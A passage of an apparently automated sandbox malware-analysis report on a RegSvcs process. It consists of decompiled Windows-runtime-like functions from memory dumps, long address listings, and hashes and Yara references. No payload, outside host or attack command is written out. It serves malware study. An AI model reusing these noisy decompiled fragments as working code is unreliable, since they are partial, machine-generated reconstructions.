										_v32 = E01322C50(_v36, _a8, _t284, _a16, _a20, _t329, 1);
									}
									_v8 = _t321;
									E01322ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t247 = _t329;
					}
					L70:
					return E0134D0D1(_t247);
				}
				L108:
			}





















































                                          0x01322584
                                          0x01322586
                                          0x01322590
                                          0x01322596
                                          0x01322597
                                          0x01322598
                                          0x01322599
                                          0x0132259e
                                          0x013225a4
                                          0x013225a9
                                          0x013225ac
                                          0x013225ae
                                          0x013225b1
                                          0x013225b2
                                          0x013225b5
                                          0x013225b8
                                          0x013225bb
                                          0x013225bc
                                          0x013225bf
                                          0x013225c2
                                          0x013225c5
                                          0x013225c6
                                          0x013225cb
                                          0x013225ce
                                          0x013225d8
                                          0x013225dd
                                          0x013225de
                                          0x013225e1
                                          0x013225e3
                                          0x013225e9
                                          0x013226da
                                          0x013226da
                                          0x013226dd
                                          0x013226e2
                                          0x01365b56
                                          0x00000000
                                          0x013226e8
                                          0x013226f9
                                          0x013226fb
                                          0x013226fe
                                          0x01322700
                                          0x01365b60
                                          0x00000000
                                          0x01322706
                                          0x01322706
                                          0x0132270a
                                          0x0132270a
                                          0x0132270d
                                          0x01322713
                                          0x01322716
                                          0x01322718
                                          0x0132271c
                                          0x0132271e
                                          0x01365b6c
                                          0x01365b6f
                                          0x01365b7f
                                          0x01365b89
                                          0x01365b8e
                                          0x01365b93
                                          0x01365b96
                                          0x01365b9c
                                          0x01365ba0
                                          0x01365ba3
                                          0x01365bab
                                          0x01365bb0
                                          0x01365bb3
                                          0x01365bb3
                                          0x01365ba3
                                          0x01322724
                                          0x01322726
                                          0x01322729
                                          0x0132272c
                                          0x0132279d
                                          0x0132279d
                                          0x013227a0
                                          0x013227a2
                                          0x00000000
                                          0x0132272e
                                          0x0132272e
                                          0x01322731
                                          0x01322734
                                          0x01322734
                                          0x01322736
                                          0x01365bc1
                                          0x01365bc1
                                          0x01365bc4
                                          0x00000000
                                          0x01365bca
                                          0x01365bca
                                          0x01365bcd
                                          0x00000000
                                          0x01365bd3
                                          0x00000000
                                          0x01365bd3
                                          0x01365bcd
                                          0x0132273c
                                          0x0132273c
                                          0x01322742
                                          0x01322747
                                          0x0132274a
                                          0x0132274d
                                          0x01322750
                                          0x00000000
                                          0x01322756
                                          0x01322756
                                          0x00000000
                                          0x01322902
                                          0x01322908
                                          0x0132290b
                                          0x00000000
                                          0x01322911
                                          0x0132291c
                                          0x01322921
                                          0x00000000
                                          0x01322921
                                          0x00000000
                                          0x00000000
                                          0x01322880
                                          0x01322887
                                          0x0132288c
                                          0x00000000
                                          0x00000000
                                          0x01322805
                                          0x0132280a
                                          0x01322814
                                          0x01322816
                                          0x00000000
                                          0x00000000
                                          0x0132281e
                                          0x01322821
                                          0x01322823
                                          0x00000000
                                          0x01322829
                                          0x01322829
                                          0x01322831
                                          0x0132283c
                                          0x0132283e
                                          0x00000000
                                          0x0132283e
                                          0x00000000
                                          0x00000000
                                          0x0132284e
                                          0x01322850
                                          0x01322851
                                          0x01322854
                                          0x01322857
                                          0x0132285a
                                          0x0132285c
                                          0x0132285d
                                          0x00000000
                                          0x00000000
                                          0x0132275d
                                          0x01322761
                                          0x00000000
                                          0x01322767
                                          0x0132276e
                                          0x01322773
                                          0x01322773
                                          0x01322776
                                          0x01322778
                                          0x0132277e
                                          0x0132277e
                                          0x01322781
                                          0x01322781
                                          0x01322783
                                          0x01322784
                                          0x00000000
                                          0x00000000
                                          0x01365bd8
                                          0x01365bde
                                          0x01365be4
                                          0x01365be6
                                          0x01365be8
                                          0x01365be9
                                          0x01365bee
                                          0x01365bf8
                                          0x01365bff
                                          0x01365c01
                                          0x01365c04
                                          0x01365c07
                                          0x01365c0b
                                          0x01365c0d
                                          0x01365c0d
                                          0x01365c15
                                          0x01365c18
                                          0x01365c1b
                                          0x01365c1b
                                          0x01365c1e
                                          0x00000000
                                          0x00000000
                                          0x013228c3
                                          0x013228c8
                                          0x013228d2
                                          0x013228d4
                                          0x013228d8
                                          0x013228db
                                          0x01365c26
                                          0x01365c28
                                          0x01365c2d
                                          0x01365c2d
                                          0x00000000
                                          0x00000000
                                          0x01365c34
                                          0x01365c36
                                          0x01365c49
                                          0x01365c4e
                                          0x01365c54
                                          0x01365c5b
                                          0x01365c5d
                                          0x01365c60
                                          0x01322788
                                          0x01322788
                                          0x0132278b
                                          0x0132278e
                                          0x0132278e
                                          0x0132278e
                                          0x01322791
                                          0x00000000
                                          0x00000000
                                          0x01322756
                                          0x01322750
                                          0x00000000
                                          0x01322794
                                          0x01322794
                                          0x01322795
                                          0x01322798
                                          0x01322798
                                          0x00000000
                                          0x01322734
                                          0x0132272c
                                          0x01322700
                                          0x013225ef
                                          0x013225ef
                                          0x013225ef
                                          0x013225f2
                                          0x013225f8
                                          0x00000000
                                          0x00000000
                                          0x013225fe
                                          0x00000000
                                          0x013228e6
                                          0x013228ec
                                          0x013228ef
                                          0x013228f5
                                          0x013228f8
                                          0x013228f8
                                          0x00000000
                                          0x013228f8
                                          0x00000000
                                          0x00000000
                                          0x01322866
                                          0x01322866
                                          0x01322876
                                          0x01322879
                                          0x00000000
                                          0x00000000
                                          0x013227e0
                                          0x013227e7
                                          0x013227e9
                                          0x013227eb
                                          0x01365afd
                                          0x00000000
                                          0x01365afd
                                          0x00000000
                                          0x00000000
                                          0x01322633
                                          0x01322638
                                          0x0132263b
                                          0x0132263c
                                          0x0132263e
                                          0x01322640
                                          0x01322642
                                          0x01322647
                                          0x01322649
                                          0x0132264e
                                          0x01322650
                                          0x01322653
                                          0x01322659
                                          0x013226a2
                                          0x013226a7
                                          0x013226ac
                                          0x013226b2
                                          0x01365b11
                                          0x01365b15
                                          0x01365b17
                                          0x00000000
                                          0x013226b8
                                          0x013226b8
                                          0x013226ba
                                          0x013227a6
                                          0x013227a6
                                          0x013227a9
                                          0x013227ab
                                          0x013227b9
                                          0x013227b9
                                          0x013227be
                                          0x013227c1
                                          0x013227c3
                                          0x013227c5
                                          0x013227c7
                                          0x01365c74
                                          0x01365c79
                                          0x01365c79
                                          0x013227c7
                                          0x00000000
                                          0x013226c0
                                          0x013226c0
                                          0x013226c3
                                          0x013226c6
                                          0x013226c6
                                          0x013226c9
                                          0x013226c9
                                          0x00000000
                                          0x013226c9
                                          0x013226ba
                                          0x0132265b
                                          0x0132265b
                                          0x0132265e
                                          0x01322667
                                          0x0132266d
                                          0x01322677
                                          0x0132267c
                                          0x0132267f
                                          0x01322681
                                          0x01365b49
                                          0x01365b4e
                                          0x013227cd
                                          0x013227d0
                                          0x013227d1
                                          0x013227d2
                                          0x013227d4
                                          0x013227dd
                                          0x01322687
                                          0x01322687
                                          0x0132268a
                                          0x0132268b
                                          0x0132268e
                                          0x0132268f
                                          0x01322691
                                          0x01322696
                                          0x01322698
                                          0x0132269d
                                          0x0132269f
                                          0x00000000
                                          0x0132269f
                                          0x01322681
                                          0x00000000
                                          0x00000000
                                          0x01322846
                                          0x00000000
                                          0x00000000
                                          0x01322605
                                          0x0132260a
                                          0x0132260c
                                          0x01322611
                                          0x01322616
                                          0x01322619
                                          0x01322619
                                          0x0132261e
                                          0x00000000
                                          0x01322624
                                          0x01322627
                                          0x01322627
                                          0x00000000
                                          0x00000000
                                          0x01365b1f
                                          0x00000000
                                          0x00000000
                                          0x01322894
                                          0x0132289b
                                          0x0132289d
                                          0x013228a1
                                          0x01365b2b
                                          0x01365b2e
                                          0x01365b2e
                                          0x013228a7
                                          0x013228a9
                                          0x01365b04
                                          0x01365b09
                                          0x01365b09
                                          0x01365b09
                                          0x00000000
                                          0x00000000
                                          0x01365b35
                                          0x01365b3c
                                          0x013228fb
                                          0x013228fb
                                          0x013226cc
                                          0x013226cc
                                          0x013226d0
                                          0x00000000
                                          0x013226d2
                                          0x013226d2
                                          0x00000000
                                          0x013226d2
                                          0x00000000
                                          0x00000000
                                          0x013225fe
                                          0x0132292d
                                          0x0132292f
                                          0x01322930
                                          0x01322935
                                          0x01322939
                                          0x0132293e
                                          0x01322941
                                          0x01322945
                                          0x01322946
                                          0x01322948
                                          0x0132294e
                                          0x0132294f
                                          0x01322957
                                          0x0132295a
                                          0x0132295c
                                          0x01322962
                                          0x01322965
                                          0x01322966
                                          0x01322968
                                          0x0132296e
                                          0x01322971
                                          0x01322974
                                          0x0132297b
                                          0x0132297e
                                          0x0132297f
                                          0x01322980
                                          0x01322981
                                          0x01322982
                                          0x01322983
                                          0x01322984
                                          0x01322985
                                          0x01322986
                                          0x01322987
                                          0x01322988
                                          0x01322989
                                          0x0132298a
                                          0x0132298b
                                          0x0132298c
                                          0x0132298d
                                          0x0132298e
                                          0x0132298f
                                          0x01322990
                                          0x01322992
                                          0x01322997
                                          0x013229a3
                                          0x013229a6
                                          0x013229ab
                                          0x013229ad
                                          0x013229b0
                                          0x013229b2
                                          0x01365c80
                                          0x013229b8
                                          0x013229b8
                                          0x013229bb
                                          0x013229c0
                                          0x013229c5
                                          0x013229c6
                                          0x013229c6
                                          0x013229c9
                                          0x013229cb
                                          0x00000000
                                          0x00000000
                                          0x013229cd
                                          0x013229d0
                                          0x013229d9
                                          0x013229db
                                          0x013229dd
                                          0x01322a7f
                                          0x01322a84
                                          0x01322a87
                                          0x01322a89
                                          0x01365ca1
                                          0x01365ca3
                                          0x00000000
                                          0x01322a8f
                                          0x01322a8f
                                          0x00000000
                                          0x01322a8f
                                          0x00000000
                                          0x013229e3
                                          0x013229e3
                                          0x013229e3
                                          0x00000000
                                          0x013229e3
                                          0x013229dd
                                          0x00000000
                                          0x013229db
                                          0x013229e6
                                          0x013229e9
                                          0x013229eb
                                          0x013229ed
                                          0x013229f3
                                          0x013229f5
                                          0x013229f8
                                          0x013229fa
                                          0x01322a97
                                          0x01322a9a
                                          0x01322a9d
                                          0x01322add
                                          0x00000000
                                          0x01322a9f
                                          0x01322aa2
                                          0x01322aa5
                                          0x01322aa8
                                          0x01322aab
                                          0x01365cab
                                          0x01365caf
                                          0x01365cc5
                                          0x01365cda
                                          0x01365cdc
                                          0x01365cdf
                                          0x01365ce5
                                          0x00000000
                                          0x01365ceb
                                          0x01365ced
                                          0x01365cee
                                          0x00000000
                                          0x01365cee
                                          0x01365cb1
                                          0x01365cb4
                                          0x01365cb9
                                          0x01365cbb
                                          0x00000000
                                          0x01365cbd
                                          0x01365cbd
                                          0x00000000
                                          0x01365cbd
                                          0x01365cbb
                                          0x01322ab1
                                          0x01322ab1
                                          0x01322ac4
                                          0x01322ac6
                                          0x01322ac6
                                          0x00000000
                                          0x01322ac6
                                          0x01322aab
                                          0x00000000
                                          0x01322a00
                                          0x01322a09
                                          0x01322a0e
                                          0x01322a21
                                          0x01322a24
                                          0x01322a35
                                          0x01322a3a
                                          0x01322a3d
                                          0x01322a42
                                          0x01322a59
                                          0x01322a59
                                          0x01322a5c
                                          0x01322a5f
                                          0x01322a5f
                                          0x013229fa
                                          0x013229f3
                                          0x01322a64
                                          0x01322a64
                                          0x01322a6b
                                          0x01322a6b
                                          0x01322a6d
                                          0x01322a72
                                          0x01322a72
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PATH
                                          • API String ID: 0-1036084923
                                          • Opcode ID: f33c9f852b857f7754f14fbba4ed19332b1f2e2e277ac14dae39ca717b9d4d0c
                                          • Instruction ID: f147f48b2f0da591527c7274166cebf1a671aaf89538380e52b40a1deb0127ec
                                          • Opcode Fuzzy Hash: f33c9f852b857f7754f14fbba4ed19332b1f2e2e277ac14dae39ca717b9d4d0c
                                          • Instruction Fuzzy Hash: 9BC18171E00229DBDB25EF9DDC80BAEBBB9FF58758F444029E501BB250D7749941CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012FC962 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 42%
                                          			E012FC962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x13ed360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0130EEF0(0x13e70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0137F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0130EB70(_t29, 0x13e70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0133B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0137F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x13e70c0; // 0x0
					while(_t38 != 0x13e70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x13eb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                          0x012fc96a
                                          0x012fc974
                                          0x012fc988
                                          0x012fc98a
                                          0x01367c9d
                                          0x01367c9f
                                          0x01367ca4
                                          0x01367cae
                                          0x01367cf0
                                          0x01367cf5
                                          0x01367cfa
                                          0x012fc992
                                          0x012fc996
                                          0x012fc997
                                          0x012fc998
                                          0x012fc9a3
                                          0x012fc9a3
                                          0x01367cb0
                                          0x01367cb7
                                          0x01367cbb
                                          0x00000000
                                          0x00000000
                                          0x01367cbd
                                          0x01367ce8
                                          0x01367cc5
                                          0x01367cc8
                                          0x01367cca
                                          0x01367cd0
                                          0x01367cd6
                                          0x01367cde
                                          0x01367ce4
                                          0x01367ce4
                                          0x01367cd0
                                          0x00000000
                                          0x01367ce8
                                          0x012fc990
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29feca407f3561aff3b3d75e76955be8432d9cde35976be14a5f3121431ab51a
                                          • Instruction ID: 4eb991a0c9475096565260ff60c81039e9fed9007a356363a55a07944fb06f11
                                          • Opcode Fuzzy Hash: 29feca407f3561aff3b3d75e76955be8432d9cde35976be14a5f3121431ab51a
                                          • Instruction Fuzzy Hash: D711E1313107069BCB21AF2CDC95A2BBBE9BF8461CF400538E94587699DB24ED54C7D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409ACC Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: N
                                          • API String ID: 0-1130791706
                                          • Opcode ID: 86d89c6ec9fc08658b6675074e315a47cad72f5037c494714ab4e3b3def23fcc
                                          • Instruction ID: 29b232ab0410c1842b08ff3d3344937bfcfb027084d5b74a6d18b6bea92652d5
                                          • Opcode Fuzzy Hash: 86d89c6ec9fc08658b6675074e315a47cad72f5037c494714ab4e3b3def23fcc
                                          • Instruction Fuzzy Hash: D55197315082919ED712CF78A8849DABFE0EE4337476806AFD8D1AF1A3C3399843C795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012F2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E012F2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x13e5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x13e7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E013397C0();
				}
				if( *0x13e79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x13e79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01321624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01317D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0138FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01339520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0132E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E0134DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x13e6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x13e6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01339980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E013395D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01317D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01317D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01377016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0138FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x13e5350;
							if(_t109 != 0x13e5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0138FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01385720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                          0x012f2d8a
                                          0x012f2d8a
                                          0x012f2d92
                                          0x012f2d96
                                          0x012f2d9e
                                          0x012f2da0
                                          0x012f2da3
                                          0x012f2da5
                                          0x012f2da8
                                          0x012f2dab
                                          0x012f2db2
                                          0x0134f9aa
                                          0x0134f9ab
                                          0x0134f9ae
                                          0x0134f9ae
                                          0x012f2db8
                                          0x012f2dc2
                                          0x0134f9b9
                                          0x0134f9be
                                          0x0134f9bf
                                          0x0134f9bf
                                          0x012f2dcf
                                          0x0134f9c9
                                          0x012f2dd5
                                          0x012f2dd5
                                          0x012f2dd5
                                          0x012f2dde
                                          0x012f2de1
                                          0x012f2e70
                                          0x012f2e72
                                          0x012f2e72
                                          0x012f2de7
                                          0x012f2deb
                                          0x012f2e7c
                                          0x012f2e83
                                          0x012f2e85
                                          0x012f2e8b
                                          0x012f2e8d
                                          0x012f2e92
                                          0x012f2e92
                                          0x012f2e85
                                          0x012f2df1
                                          0x012f2df7
                                          0x012f2df9
                                          0x012f2df9
                                          0x012f2dfc
                                          0x012f2dff
                                          0x012f2e02
                                          0x00000000
                                          0x012f2e05
                                          0x012f2e0c
                                          0x0134f9d9
                                          0x012f2e12
                                          0x012f2e12
                                          0x012f2e12
                                          0x012f2e1a
                                          0x0134f9e3
                                          0x0134f9e9
                                          0x0134f9f0
                                          0x0134f9f6
                                          0x0134f9f8
                                          0x0134f9f8
                                          0x0134f9f0
                                          0x012f2e23
                                          0x0134fa02
                                          0x0134fa03
                                          0x0134fa05
                                          0x0134fa06
                                          0x00000000
                                          0x012f2e29
                                          0x012f2e29
                                          0x012f2e2e
                                          0x012f2e34
                                          0x012f2e3e
                                          0x00000000
                                          0x00000000
                                          0x012f2e44
                                          0x012f2e47
                                          0x012f2e4d
                                          0x00000000
                                          0x00000000
                                          0x012f2e4f
                                          0x012f2e54
                                          0x00000000
                                          0x00000000
                                          0x012f2e5a
                                          0x012f2e5f
                                          0x012f2e9a
                                          0x012f2ea4
                                          0x012f2ea5
                                          0x012f2ea8
                                          0x012f2eaf
                                          0x012f2eb2
                                          0x012f2eb5
                                          0x0134fae9
                                          0x0134faeb
                                          0x0134faed
                                          0x0134faef
                                          0x0134faf7
                                          0x0134faf8
                                          0x0134fafd
                                          0x0134faff
                                          0x0134fb04
                                          0x0134fb04
                                          0x0134faff
                                          0x012f2ec0
                                          0x012f2ec4
                                          0x012f2ec6
                                          0x012f2ec8
                                          0x0134fb14
                                          0x0134fb18
                                          0x0134fb1e
                                          0x0134fb21
                                          0x0134fb21
                                          0x012f2ece
                                          0x012f2ece
                                          0x012f2ece
                                          0x012f2ed7
                                          0x012f2e61
                                          0x012f2e63
                                          0x0134fa6b
                                          0x0134fa71
                                          0x0134fa76
                                          0x0134fa78
                                          0x0134fa8a
                                          0x0134fa7a
                                          0x0134fa83
                                          0x0134fa83
                                          0x0134fa8f
                                          0x0134fa91
                                          0x0134fa97
                                          0x0134fa9d
                                          0x0134faa4
                                          0x0134faaa
                                          0x0134faaf
                                          0x0134fab1
                                          0x0134fac3
                                          0x0134fab3
                                          0x0134fabc
                                          0x0134fabc
                                          0x0134fac8
                                          0x0134facb
                                          0x0134fadf
                                          0x0134fadf
                                          0x0134facb
                                          0x0134faa4
                                          0x0134fa91
                                          0x012f2e6f
                                          0x012f2e6f
                                          0x012f2e5f
                                          0x0134fa13
                                          0x0134fa15
                                          0x0134fa17
                                          0x0134fa1f
                                          0x0134fa21
                                          0x0134fa22
                                          0x0134fa25
                                          0x0134fa28
                                          0x0134fa2f
                                          0x0134fa2f
                                          0x0134fa2a
                                          0x0134fa2a
                                          0x0134fa2a
                                          0x0134fa31
                                          0x0134fa34
                                          0x0134fa36
                                          0x0134fa3c
                                          0x0134fa3e
                                          0x0134fa41
                                          0x0134fa43
                                          0x0134fa45
                                          0x0134fa45
                                          0x0134fa41
                                          0x0134fa3c
                                          0x0134fa4a
                                          0x0134fa4f
                                          0x0134fa51
                                          0x0134fa53
                                          0x0134fa56
                                          0x0134fa5b
                                          0x0134fa5e
                                          0x00000000
                                          0x0134fa5e
                                          0x012f2e23

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Re-Waiting
                                          • API String ID: 0-316354757
                                          • Opcode ID: 3f00a9422555508b09daf7c84e94c1263814cfd416aee1fdaf70038758745ecf
                                          • Instruction ID: 7b220ae86faaecf01386621db4a658a79b0d3fc212e7864697c643c90af5badd
                                          • Opcode Fuzzy Hash: 3f00a9422555508b09daf7c84e94c1263814cfd416aee1fdaf70038758745ecf
                                          • Instruction Fuzzy Hash: ED612431A10645DFEB32DF6CC844B7EBBE9EB46718F280269EA11972C1C774F9018B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C0EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E013C0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E013BFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E013C1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01339730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E013BA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E013BA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x13e8b04 >> 0x14) + (_v44 -  *0x13e8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01317D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
